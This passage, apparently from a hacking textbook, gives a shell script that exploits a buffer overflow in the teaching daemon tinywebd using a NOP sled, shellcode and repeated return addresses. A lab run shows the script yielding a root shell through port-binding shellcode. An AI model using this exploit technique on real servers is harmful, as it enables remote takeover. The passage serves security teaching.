Graphics Programs Reference
In-Depth Information
message. Shell variables are used for the offset and overwrite return address,
so they can be easily changed for a different target. The shellcode used for
the exploit is passed as a command-line argument, which makes this a useful
tool for trying out a variety of shellcodes.
xtool_tinywebd.sh
#!/bin/sh
# A tool for exploiting tinywebd
if [ -z "$2" ]; then # If argument 2 is blank
echo "Usage: $0 <shellcode file> <target IP>"
exit
fi
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE))
echo "[NOP ($ALIGNED_SLED_SIZE bytes)] [shellcode ($SIZE bytes)] [ret addr
($((4*32)) bytes)]"
( perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;
perl -e "print \"$RETADDR\"x32 . \"\r\n\"";) | nc -w 1 -v $2 80
Notice that this script repeats the return address an additional thirty-third
time, but it uses 128 bytes (32 × 4) for calculating the sled size. This puts an
extra copy of the return address past where the offset dictates. Sometimes
different compiler options will move the return address around a little bit,
so this makes the exploit more reliable. The output below shows this tool being
used to exploit the tinyweb daemon once again, but with the port-binding
shellcode.
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ./xtool_tinywebd.sh portbinding_shellcode 127.0.0.1
target IP: 127.0.0.1
shellcode: portbinding_shellcode (92 bytes)
[NOP (324 bytes)] [shellcode (92 bytes)] [ret addr (128 bytes)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
root
Now that the attacking side is armed with an exploit script, consider what
happens when it's used. If you were the administrator of the server running
the tinyweb daemon, what would be the first signs that you were hacked?
